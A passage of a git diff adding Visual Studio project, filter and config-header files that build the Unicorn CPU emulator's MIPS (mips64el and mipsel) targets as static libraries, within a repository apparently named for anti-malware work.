<ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips64el.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips64el.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips64el.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips64el.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/mips64el-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/mips64el-softmmu.vcxproj.filters new file mode 100644 index 0000000..88aa508 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/mips64el-softmmu.vcxproj.filters @@ -0,0 +1,128 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{2b2b58ad-804f-435b-b55d-1c21e050cf31}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{a6046583-2534-498c-9bd2-08dd8c222c18}</UniqueIdentifier> + </Filter> + <Filter Include="hw\mips"> + <UniqueIdentifier>{2253570a-0bc0-4366-9eab-095257ab37b2}</UniqueIdentifier> + </Filter> + <Filter Include="target-mips"> + <UniqueIdentifier>{de33cbbc-f374-4451-a083-23c5a98c843e}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{b4ef3640-fe65-476d-9b4f-3c6d82a5dbfd}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{95533292-741a-46c5-a003-cbb60c8654ce}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\cpu.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\cpu-qom.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\helper.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\mips-defs.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\unicorn.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\mips64el.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\mips_r4k.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\addr.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\cputimer.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\cpu.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\dsp_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\lmi_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\msa_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\op_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\translate.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\translate_init.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\unicorn.c"> + <Filter>target-mips</Filter> + </ClCompile> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/config-target.h new file mode 100644 index 0000000..68b5238 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/config-target.h @@ -0,0 +1,6 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_ABI_MIPSO32 1 +#define TARGET_MIPS 1 +#define TARGET_NAME "mipsel" +#define TARGET_MIPS 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/mipsel-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/mipsel-softmmu.vcxproj new file mode 100644 index 0000000..b522af3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/mipsel-softmmu.vcxproj @@ -0,0 +1,237 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\mips-defs.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\mipsel.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\addr.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\cputimer.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\mips_r4k.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\dsp_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\lmi_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\msa_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\translate_init.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\unicorn.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{006A7908-ABF3-4D18-BC35-0A29E39B95F9}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>mipselsoftmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mipsel.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mipsel.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mipsel.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mipsel.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/mipsel-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/mipsel-softmmu.vcxproj.filters new file mode 100644 index 0000000..3ec346f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mipsel-softmmu/mipsel-softmmu.vcxproj.filters @@ -0,0 +1,128 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" 